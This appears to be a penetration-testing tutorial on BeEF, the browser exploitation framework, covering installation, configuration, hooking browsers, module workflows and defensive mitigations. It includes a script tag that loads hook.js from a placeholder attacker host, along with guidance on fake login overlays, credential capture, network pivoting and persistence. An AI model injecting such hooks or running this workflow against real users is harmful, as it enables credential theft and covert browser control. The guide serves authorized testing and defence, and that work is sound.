BeEF: Browser Exploitation Framework
๐ช๐ต๐ฎ๐ ๐ถ๐ ๐๐ฒ๐๐
BeEF (Browser Exploitation Framework) is an open-source penetration-testing framework that focuses on client-side (browser) attack vectors. Rather than targeting a machine or network directly, BeEF โhooksโ browsers (via injected JavaScript) and exposes a control panel where the tester can run modules against hooked browsers to gather info, pivot, or run social-engineering and client-side exploits.
๐๐ฟ๐ฐ๐ต๐ถ๐๐ฒ๐ฐ๐๐๐ฟ๐ฒ & ๐ฐ๐ผ๐ฟ๐ฒ ๐ฐ๐ผ๐บ๐ฝ๐ผ๐ป๐ฒ๐ป๐๐
Hook: a small JavaScript snippet (the โhook.jsโ) that, when loaded by a browser, registers that browser with the BeEF server and enables remote control.
BeEF Server / Control Panel: web UI + backend (Ruby/Node components) where hooked clients appear and modules are invoked.
Modules: discrete commands/scripts grouped into categories (info-gathering, social engineering, network scanning, persistence, etc.). Modules are written to execute in the context of the hooked browser.
API / Integrations: a REST API and plugins allow integration with tools like Metasploit, automation scripts, or orchestration platforms.
๐ ๐ฎ๐ท๐ผ๐ฟ ๐บ๐ผ๐ฑ๐๐น๐ฒ ๐ฐ๐ฎ๐๐ฒ๐ด๐ผ๐ฟ๐ถ๐ฒ๐ & ๐ฒ๐
๐ฎ๐บ๐ฝ๐น๐ฒ๐ (๐๐ต๐ฎ๐ ๐๐ฒ๐๐ ๐ฐ๐ฎ๐ป ๐ฑ๐ผ)
(BeEF has many modules โ below are categories and representative examples, not exploit code.)
Information Gathering: enumerate browser fingerprint, plugins, DOM, open tabs, geolocation (if allowed), cookies (subject to same-origin), system info surfaced via JS.
Social Engineering: fake login dialogs, modal overlays, credential capture pages, UI redress โ used to trick the user into disclosing credentials or performing actions.
Network / Pivoting: run scripts that cause the victim browser to probe internal hosts (portscan via XHR where possible), gather LAN info, or relay traffic; useful to map internal networks from a browserโs perspective.
Client-side Attacks: inject JS to perform keylogging (within the page context), take screenshots (with user permissions or via trickery), or attempt cookie/session capture (again, constrained by same-origin and browser protections).
Persistence / Re-hooking: techniques to try and maintain access (e.g., convincing the user to bookmark a malicious page, injecting persistent code where you have write access), or chaining through social engineering to get re-hooks.
Utility modules: spawn reverse requests, run arbitrary JS, or call other services through the hooked context.
๐๐ผ๐ ๐ฏ๐ฟ๐ผ๐๐๐ฒ๐ฟ๐ ๐๐๐ฝ๐ถ๐ฐ๐ฎ๐น๐น๐ ๐ด๐ฒ๐ โ๐ต๐ผ๐ผ๐ธ๐ฒ๐ฑโ (๐ต๐ถ๐ด๐ต-๐น๐ฒ๐๐ฒ๐น)
Stored/Reflected XSS: injecting the hook into a page that a victim visits.
Malicious pages / phishing: luring users to a page you control that includes the hook.
Third-party injection: compromising ad networks, CDN resources, or other content that pages include (historical real-world vectors).
(These are conceptual vectors; perform only on systems with consent.)
๐๐ป๐๐๐ฎ๐น๐น๐ฎ๐๐ถ๐ผ๐ป & ๐ฑ๐ฒ๐ฝ๐น๐ผ๐๐บ๐ฒ๐ป๐ (๐ผ๐๐ฒ๐ฟ๐๐ถ๐ฒ๐ / ๐ฐ๐๐ฟ๐ฟ๐ฒ๐ป๐ ๐ป๐ผ๐๐ฒ๐)
BeEF is actively maintained; official repo and docs live on the BeEF project site and GitHub. It runs on systems that can run Ruby (commonly Kali or other Linux distros), and thereโs a Docker option to simplify deployment. Refer to the official install docs for exact Ruby/Node/OS requirements and the recommended secure configuration.
Kali packages/tools include beef-xss packaging/integration, so youโll often find it prepackaged or available via Kali repositories.
๐ญ) ๐๐ป๐๐๐ฎ๐น๐น ๐๐ฒ๐๐ (๐ฎ ๐๐๐ฝ๐ถ๐ฐ๐ฎ๐น ๐๐ฎ๐๐)
A. Kali package (fastest)
On Kali:
sudo apt update && sudo apt install beef-xss -yStart with the packaged launcher: beef-xss โ it prints the UI URL and the hook path. Kali docs show this usage.
B. From source (latest / non-Kali Linux)
Clone repo:
git clone https://github.com/beefproject/beef.gitcd beef โ follow README / installation steps: ensure Ruby (3.0+), NodeJS, sqlite3, run bundle install, then configure config.yaml. The official wiki has up-to-date install steps (including Docker option).
๐ฎ) ๐๐ผ๐ป๐ณ๐ถ๐ด๐๐ฟ๐ฒ (๐ฒ๐๐๐ฒ๐ป๐๐ถ๐ฎ๐น)
Edit config.yaml (/usr/share/beef-xss/config.yaml on Kali or config.yaml in cloned dir): set the UI username/password, the beef.http.host (IP/interface you want to serve hook from), beef.http.port (default 3000), and any REST/API or database settings. Save securely.
๐ฏ) ๐ฆ๐๐ฎ๐ฟ๐ ๐๐ฒ๐๐ & ๐ณ๐ถ๐ป๐ฑ ๐๐ต๐ฒ ๐ต๐ผ๐ผ๐ธ
Start: ./beef (or beef-xss on Kali). The console will display the Web UI URL (e.g. http://127.0.0.1:3000/ui/panel) and the hook path (default /hook.js).
The hook snippet you will inject into pages looks like:
<script src="http://<YOUR_BE_EF_IP>:3000/hook.js"></script> replace <YOUR_BE_EF_IP> and port as appropriate.
๐ฐ) ๐๐ผ๐ผ๐ธ ๐ฎ ๐ฏ๐ฟ๐ผ๐๐๐ฒ๐ฟ (๐ฎ๐๐๐ต๐ผ๐ฟ๐ถ๐๐ฒ๐ฑ ๐น๐ฎ๐ฏ ๐บ๐ฒ๐๐ต๐ผ๐ฑ๐)
Local test page: create a simple HTML page in a local webserver that includes the hook <script> and open it in a target browser (test VM or consenting user).
XSS lab: in a controlled XSS lab, inject the hook as the XSS payload into a page you control for test purposes.
When a browser loads the page with the hook, it will show up in BeEFโs control panel as a โhooked browserโ with identifying info (user-agent, IP, modules available).
๐ฑ) ๐จ๐๐ถ๐ป๐ด ๐๐ต๐ฒ ๐ช๐ฒ๐ฏ ๐จ๐: ๐บ๐ผ๐ฑ๐๐น๐ฒ๐ & ๐๐ผ๐ฟ๐ธ๐ณ๐น๐ผ๐
Login to the Web UI (/ui/panel) and click the hooked browser entry. The UI shows categories of modules (Info, Social Engineering, Network, Exploits, Persistence, etc.). The official modules wiki lists modules and descriptions.
๐ง๐๐ฝ๐ถ๐ฐ๐ฎ๐น ๐๐ผ๐ฟ๐ธ๐ณ๐น๐ผ๐:
1. Run info-gathering modules first (fingerprint, plugins, cookies, open tabs) to understand the environment.
2. Use safe social-engineering modules (e.g., modal prompts, fake login overlays) in a test scenario to demonstrate risk to stakeholders.
3. If required and authorized, run network-probing modules to map internal services reachable from the browserโs network context (remember same-origin and browser restrictions).
Each module returns results in the UI; you can capture output, screenshots (if available/allowed), and save logs.
๐ฒ) ๐ฃ๐ฒ๐ฟ๐๐ถ๐๐๐ฒ๐ป๐ฐ๐ฒ & ๐ฝ๐ถ๐๐ผ๐๐ถ๐ป๐ด (๐ฒ๐๐ต๐ถ๐ฐ๐ฎ๐น ๐๐๐ฎ๐ด๐ฒ)
BeEF offers persistence helpers (bookmarklets, convincing users to re-open pages, or storing re-hook code where you control content). Use only in scoped tests and document risk.
Pivoting from a hooked browser can discover internal hosts (via AJAX, WebRTC, etc.) and feed that data back to your team for follow-up testing.
๐ณ) ๐๐ป๐๐ฒ๐ด๐ฟ๐ฎ๐๐ถ๐ผ๐ป๐ & ๐ฎ๐๐๐ผ๐บ๐ฎ๐๐ถ๐ผ๐ป
BeEF supports API access and can be integrated with Metasploit or orchestration tools. You can automate module runs via the REST API for repeatable test cases and evidence collection. Configure integrations in config.yaml if needed.
๐ด) ๐๐ผ๐ด๐ด๐ถ๐ป๐ด, ๐ฒ๐๐ถ๐ฑ๐ฒ๐ป๐ฐ๐ฒ & ๐ฟ๐ฒ๐ฝ๐ผ๐ฟ๐๐ถ๐ป๐ด
Save module outputs, screenshots, timestamps, and network logs from both BeEF and your attack VM. Produce a clear findings report that describes impact, reproducible steps (to the level authorized), remediation guidance (fix XSS, CSP, SRI, SameSite cookies), and risk severity.
๐ต) ๐๐ฒ๐ณ๐ฒ๐ป๐๐ฒ๐ ๐๐ผ๐ ๐๐ต๐ผ๐๐น๐ฑ ๐๐ฒ๐๐ ๐ฎ๐ป๐ฑ ๐ฟ๐ฒ๐ฐ๐ผ๐บ๐บ๐ฒ๐ป๐ฑ
Sanitize and encode inputs to prevent XSS, implement strict CSP to block external scripts, use SRI for third-party scripts, set cookies HttpOnly/SameSite, keep browsers patched, and monitor for suspicious outbound connections to hook servers. These are the key mitigations to include in remediation.
๐๐ป๐๐ฒ๐ด๐ฟ๐ฎ๐๐ถ๐ผ๐ป๐ & ๐ฎ๐๐๐ผ๐บ๐ฎ๐๐ถ๐ผ๐ป
Metasploit / Armitage / C2 tools: BeEF can be integrated to hand off browser sessions or coordinate with other frameworks (Metasploit integrations, REST API hooks, automation scripts exist). This is useful in red-team scenarios for chain-exploitation.
Scripting / REST API: BeEF exposes APIs so you can automate module runs, collect outputs, and feed them into other tooling.
๐๐ฒ๐๐ฒ๐ฐ๐๐ถ๐ผ๐ป & ๐บ๐ถ๐๐ถ๐ด๐ฎ๐๐ถ๐ผ๐ป (๐ฑ๐ฒ๐ณ๐ฒ๐ป๐๐ถ๐๐ฒ ๐ฐ๐ผ๐ป๐๐ฟ๐ผ๐น๐)
If youโre defending systems, hereโs what helps prevent or detect BeEF-style attacks:
Fix XSS and sanitize inputs โ the primary vector for hooking. Use output encoding, CSP, and input validation.
Content Security Policy (CSP) โ strong CSP can prevent loading of external hook scripts.
Subresource Integrity (SRI) and strict resource hosting policies for external scripts.
Browser hardening: disable unnecessary plugins, use SameSite cookies, HTTPOnly flags for cookies, and keep browsers up to date.
Network monitoring / EDR: watch for anomalous outbound connections to suspicious servers serving hook.js and for unusual browser-originated scans.
User training and phishing defenses for social engineering vectors.
๐๐ฒ๐ด๐ฎ๐น & ๐ฒ๐๐ต๐ถ๐ฐ๐ฎ๐น ๐ฐ๐ผ๐ป๐๐ถ๐ฑ๐ฒ๐ฟ๐ฎ๐๐ถ๐ผ๐ป๐
BeEF is a powerful tool that can violate privacy and law if misused. Only run BeEF on targets you own or for which you have explicit, written authorization. Many countries criminalize unauthorized computer access and interception. Always document authorization, scope, and reporting requirements when doing assessments.
